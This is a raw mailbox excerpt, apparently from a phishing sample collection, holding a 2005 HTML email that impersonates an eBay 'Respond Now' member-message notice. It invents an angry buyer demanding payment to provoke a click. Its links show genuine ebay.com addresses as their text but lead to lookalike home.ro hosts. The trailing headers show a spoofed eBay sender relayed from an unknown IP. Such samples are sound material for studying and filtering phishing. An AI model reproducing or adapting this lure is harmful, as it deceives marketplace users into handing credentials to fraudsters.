	* -0.7 AWL AWL: From: address is in the auto white-list
Message-Id: <20051101120837.5F8956CCF2B@mail1.monkey.org>
Content-Length: 13038
Lines: 195
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 412



<DIV>
<TABLE border=0 cellPadding=2 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD><FONT color=#666666 face="Verdana, sans-serif" size=1><B>eBay sent this message.</B><BR>Your registered name is included to show this message originated from eBay. <A href="http://singinsesa.home.ro/IncopartnerIdpUserIdsiteidpageTypepa1i1bshowgifUsingSSLhttp3A2F2Fwwpppa2errmsgrunameruparamsruproductfavoritenavmigrateVisitor" target=_blank><FONT color=#003399>Learn more</FONT></A>. </FONT></TD></TR></TBODY></TABLE>
<TABLE bgColor=white border=0 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD noWrap width="1%"><IMG src="http://pics.ebaystatic.com/aw/pics/email/syiSessions/hdrLeft_13x39.gif"></TD>
<TD background=http://pics.ebaystatic.com/aw/pics/email/syiSessions/imgSpan_5x39.gif noWrap width="98%"><SPAN class=SectionTitle><FONT size=4><B><A href="http://singinsesa.home.ro/IncopartnerIdpUserIdsiteidpageTypepa1i1bshowgifUsingSSLhttp3A2F2Fwwpppa2errmsgrunameruparamsruproductfavoritenavmigrateVisitor" target=_blank>Response to Question about Item -- Respond Now</A></B></FONT></SPAN></TD>
<TD noWrap vAlign=bottom width="1%"><IMG alt=eBay src="http://pics.ebaystatic.com/aw/pics/email/syiSessions/hdrRight_90x39.gif"></TD></TR></TBODY></TABLE>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD><IMG height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=10></TD>
<TD>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD>
<TABLE bgColor=#eeeef8 border=0 style="BORDER-BOTTOM: #9999cc 1px solid; BORDER-LEFT: #9999cc 1px solid; BORDER-RIGHT: #9999cc 1px solid" width="100%">
<TBODY>
<TR>
<TD height=30 style="PADDING-LEFT: 8px"><FONT face="Arial, Verdana" size=2>eBay sent this message on behalf of an eBay member via My Messages. Responses sent using email will go to the eBay member directly and will include your email address. Click the <B>Respond Now</B> button below to send your response via My Messages (your email address will not be included).</FONT> </TD></TR></TBODY></TABLE></TD>
<TD><IMG height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=10></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE><IMG height=10 src="http://pics.ebaystatic.com/aw/pics/s.gif">
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD><IMG height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=10></TD>
<TD vAlign=top>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD vAlign=top>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD>
<TABLE align=center bgColor=#9999cc border=0 cellPadding=1 cellSpacing=0 width="100%">
<TBODY>
<TR bgColor=#9999cc height=26>
<TD><FONT color=#ffffff>&nbsp;<SPAN class=SectionTitle>Response from yabe963</SPAN></FONT> </TD></TR>
<TR>
<TD>
<TABLE align=center border=0 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR bgColor=#eeeeee>
<TD>
<TABLE cellPadding=0 cellSpacing=4 width="100%">
<TBODY>
<TR>
<TD>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD><FONT face="Arial, Verdana"><FONT size=2>Item:&nbsp;</FONT><FONT size=2><STRONG>Area-51M 7700</STRONG></FONT><FONT size=2> (<A href="http://singinsesa.home.ro/IncopartnerIdpUserIdsiteidpageTypepa1i1bshowgifUsingSSLhttp3A2F2Fwwpppa2errmsgrunameruparamsruproductfavoritenavmigrateVisitor" target=_blank>6808709029</A></FONT><FONT size=2>)</FONT></FONT></TD></TR>
<TR>
<TD><FONT face="Arial, Verdana" size=2>This message was sent after the listing <B>closed</B>.</FONT></TD></TR>
<TR>
<TD><FONT face="Arial, Verdana" size=2>yabe963 is the <B>winner</B>.</FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR>
<TR bgColor=#c6c6c6>
<TD><IMG height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR>
<TR bgColor=#ffffff>
<TD>
<TABLE cellPadding=4 cellSpacing=0>
<TBODY>
<TR>
<TD vAlign=top width="75%"><FONT face="Arial, Verdana" size=2>Why&nbsp;aren't you sending me the money for the item i&nbsp;sold you&nbsp; ??? I waited long enough for you.&nbsp;I will report you to eBay. I am not a fool!!! <BR></FONT></TD>
<TD align=middle vAlign=top width="22%">
<TABLE bgColor=#eeeef8 border=1 borderColor=#999999 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD>
<TABLE cellPadding=3 cellSpacing=3 width="100%">
<TBODY>
<TR>
<TD align=middle><FONT face="Arial, Verdana" size=2><B>Respond to this question in My Messages.</B></FONT> </TD></TR>
<TR>
<TD align=middle><A href="http://singinsesa.home.ro/IncopartnerIdpUserIdsiteidpageTypepa1i1bshowgifUsingSSLhttp3A2F2Fwwpppa2errmsgrunameruparamsruproductfavoritenavmigrateVisitor" target=_blank><IMG alt="Respond Now" border=0 src="http://pics.ebaystatic.com/aw/pics/email/message/btnRespondNow.gif"></A></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD>
<TD width="3%"></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD><IMG height=15 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR>
<TR>
<TD>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR bgColor=#9c9c9c>
<TD colSpan=3><IMG border=0 height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR>
<TR bgColor=#d6deff height=22>
<TD align=left width="1%"><IMG border=0 height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=16></TD>
<TD align=left><FONT face="Arial, Verdana" size=2><B>Item Details</B></FONT> </TD></TR>
<TR bgColor=#ffffff>
<TD colSpan=3><IMG border=0 height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR>
<TR bgColor=#fed73b>
<TD colSpan=3><IMG border=0 height=1 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR></TBODY></TABLE>
<TABLE bgColor=white cellPadding=0 cellSpacing=0 style="BORDER-BOTTOM: #d6dcfe 1px solid; BORDER-LEFT: #d6dcfe 1px solid; BORDER-RIGHT: #d6dcfe 1px solid; BORDER-TOP: #d6dcfe 1px solid" width="100%">
<TBODY>
<TR>
<TD width="100%">
<TABLE border=0 cellPadding=3 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD noWrap width="1%"><FONT face="Arial, Verdana" size=2>Item name:</FONT></TD>
<TD><FONT face="Arial, Verdana" size=2>braces/suspenders black in color ~NEW~ NR</FONT> </TD></TR>
<TR bgColor=#f4f4f4>
<TD noWrap width="1%"><FONT face="Arial, Verdana" size=2>Item number:</FONT></TD>
<TD><FONT face="Arial, Verdana" size=2>8222416824</FONT> </TD></TR>
<TR>
<TD noWrap width="1%"><FONT face="Arial, Verdana" size=2>End date:</FONT></TD>
<TD><FONT face="Arial, Verdana" size=2>Sep-28-05&nbsp;19:28:41 PDT</FONT> </TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD><IMG height=5 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR>
<TR>
<TD>
<TABLE border=0 cellPadding=0 cellSpacing=0>
<TBODY>
<TR>
<TD><IMG border=0 height=8 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR>
<TR>
<TD><FONT face="Arial, Verdana" size=2>View item description:</FONT></TD></TR>
<TR>
<TD><FONT color=#003399 face="Arial, Verdana" size=2>
<DIV><A href="http://singinsesa.home.ro/IncopartnerIdpUserIdsiteidpageTypepa1i1bshowgifUsingSSLhttp3A2F2Fwwpppa2errmsgrunameruparamsruproductfavoritenavmigrateVisitor" target=_blank><FONT face=Arial size=2>http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&amp;item=8222416824&amp;sspagename=ADME:B:RTQ:US:1</FONT></A></DIV></FONT></TD></TR>
<TR>
<TD><FONT color=#003399><IMG border=0 height=10 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></FONT></TD></TR>
<TR>
<TD><FONT face="Arial, Verdana" size=2>Thank you for using eBay!</FONT></TD></TR>
<TR>
<TD><FONT color=#003399 face="Arial, Verdana" size=2><A href="http://www.ebay.com/" target=_blank>http://www.ebay.com/</A></FONT></TD></TR>
<TR>
<TD><FONT color=#003399><IMG border=0 height=10 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD>
<TD vAlign=top width=10><FONT color=#003399><IMG src="http://pics.ebaystatic.com/aw/pics/s.gif" width=10></FONT></TD>
<TD align=right vAlign=top width=188>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD>
<TABLE border=0 cellPadding=0 cellSpacing=0 style="BORDER-BOTTOM: #6b7b91 1px solid; BORDER-LEFT: #6b7b91 1px solid; BORDER-RIGHT: #6b7b91 1px solid; BORDER-TOP: #6b7b91 1px solid">
<TBODY>
<TR>
<TD>
<TABLE border=0 cellPadding=0 cellSpacing=0>
<TBODY>
<TR>
<TD>
<TABLE border=0 cellPadding=0 cellSpacing=0>
<TBODY>
<TR>
<TD bgColor=#cad2dd><FONT color=#003399><IMG alt="Marketplace Safety Tip" border=0 height=25 src="http://pics.ebaystatic.com/aw/pics/securityCenter/imgShield_25x25.gif" width=25></FONT></TD>
<TD bgColor=#cad2dd noWrap><FONT face="Arial, Helvetica, Verdana, sans-serif" size=-1><B><A href="http://pages.ebay.com/securitycenter" style="COLOR: #000000; TEXT-DECORATION: none" target=_blank>Marketplace Safety Tip</A></B></FONT> </TD>
<TD bgColor=#cad2dd><IMG alt=" " border=0 height=25 src="http://pics.ebaystatic.com/aw/pics/securityCenter/imgTabCorner_25x25.gif" title="" width=25></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD>
<TABLE border=0 cellPadding=5 cellSpacing=0>
<TBODY>
<TR>
<TD><FONT face="Arial, Verdana" size=2>Always remember to complete your transaction on eBay - it's the safer way to buy. <BR><BR>Please do not offer to buy or sell this item through this form without completing the transaction on eBay. If you receive a response inviting you to transact outside of eBay, you should decline -- such transactions may be unsafe and are against eBay policy. </FONT></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD bgColor=#c9d2dc height=5><IMG height=5 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD><IMG height=10 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR>
<TR>
<TD>
<TABLE border=0 cellPadding=5 cellSpacing=0 style="BORDER-BOTTOM: #c6c6c6 1px solid; BORDER-LEFT: #c6c6c6 1px solid; BORDER-RIGHT: #c6c6c6 1px solid; BORDER-TOP: #c6c6c6 1px solid" width="100%">
<TBODY>
<TR>
<TD><FONT face="Arial, Verdana" size=2>Is this email inappropriate? Does it violate <A href="http://singinsesa.home.ro/IncopartnerIdpUserIdsiteidpageTypepa1i1bshowgifUsingSSLhttp3A2F2Fwwpppa2errmsgrunameruparamsruproductfavoritenavmigrateVisitor" target=_blank><FONT color=#003399>eBay policy</FONT></A>? Help protect the community by <A href="http://singinsesa.home.ro/IncopartnerIdpUserIdsiteidpageTypepa1i1bshowgifUsingSSLhttp3A2F2Fwwpppa2errmsgrunameruparamsruproductfavoritenavmigrateVisitor" target=_blank><FONT color=#003399>reporting it</FONT></A>. </FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD colSpan=3><IMG height=10 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR></TBODY></TABLE>
<TABLE bgColor=#cccccc cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD height=1></TD></TR></TBODY></TABLE>
<TABLE border=0 cellPadding=0 cellSpacing=0 width="100%">
<TBODY>
<TR>
<TD><IMG height=5 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR>
<TR>
<TD><FONT color=#666666 face="Arial, Verdana" size=1>Learn how you can protect yourself from spoof (fake) emails at:<BR><A href="http://sindgeabays.home.ro/ebaynoyificatiobebayflgjgjjfsjufgytfdfvxgc" target=_blank><FONT color=#003399>http://pages.ebay.com/education/spooftutorial</FONT></A> </FONT></TD></TR>
<TR>
<TD><IMG height=5 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR>
<TR>
<TD><FONT color=#666666 face="Arial, Verdana" size=1>This eBay notice was sent to you on behalf of another eBay member through the eBay platform and in accordance with our Privacy Policy. If you would like to receive this email in text format, change your <A href="http://sindgeabays.home.ro/ebaynoyificatiobebayflgjgjjfsjufgytfdfvxgc" target=_blank onfiltered="return openNonHelpWindow(this.href);"><FONT color=#003399>notification preferences</FONT></A>. </FONT></TD></TR>
<TR>
<TD><IMG height=5 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR>
<TR>
<TD><FONT color=#666666 face="Arial, Verdana" size=1>See our Privacy Policy and User Agreement if you have questions about eBay's communication policies.<BR>Privacy Policy: <A href="http://sindgeabays.home.ro/ebaynoyificatiobebayflgjgjjfsjufgytfdfvxgc" target=_blank><FONT color=#003399>http://pages.ebay.com/help/policies/privacy-policy.html</FONT></A><BR>User Agreement: <A href="http://sindgeabays.home.ro/ebaynoyificatiobebayflgjgjjfsjufgytfdfvxgc" target=_blank><FONT color=#003399>http://pages.ebay.com/help/policies/user-agreement.html</FONT></A> </FONT></TD></TR>
<TR>
<TD><IMG height=5 src="http://pics.ebaystatic.com/aw/pics/s.gif" width=1></TD></TR>
<TR>
<TD><FONT color=#666666 face="Arial, Verdana" size=1>Copyright ©&nbsp;2005 eBay, Inc. All Rights Reserved.<BR>Designated trademarks and brands are the property of their respective owners.<BR>eBay and the eBay logo are registered trademarks or trademarks of eBay, Inc.<BR>eBay is located at 2145 Hamilton Avenue, San Jose, CA 95125. </FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
<DIV></DIV><BR>
<P></P></DIV>

From aw-confirm@eBay.com  Tue Nov  1 07:38:59 2005
Return-Path: <aw-confirm@eBay.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id 19D5E536E43
	for <jose@login.monkey.org>; Tue,  1 Nov 2005 07:38:59 -0500 (EST)
Received: from mail1.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail1.monkey.org (Postfix) with ESMTP id 5C0916CCF2F
	for <jose@monkey.org>; Tue,  1 Nov 2005 07:38:57 -0500 (EST)
Received: from 86.55.38.100 (unknown [86.55.38.100])
	by mail1.monkey.org (Postfix) with SMTP
	for <jose@monkey.org>; Tue,  1 Nov 2005 07:38:57 -0500 (EST)
Received: from 15.8.132.214 by ; Tue, 01 Nov 2005 18:33:58 +0600
Message-ID: <MJNCTYCBGYIFZYWRLJDRF@comcast.net>
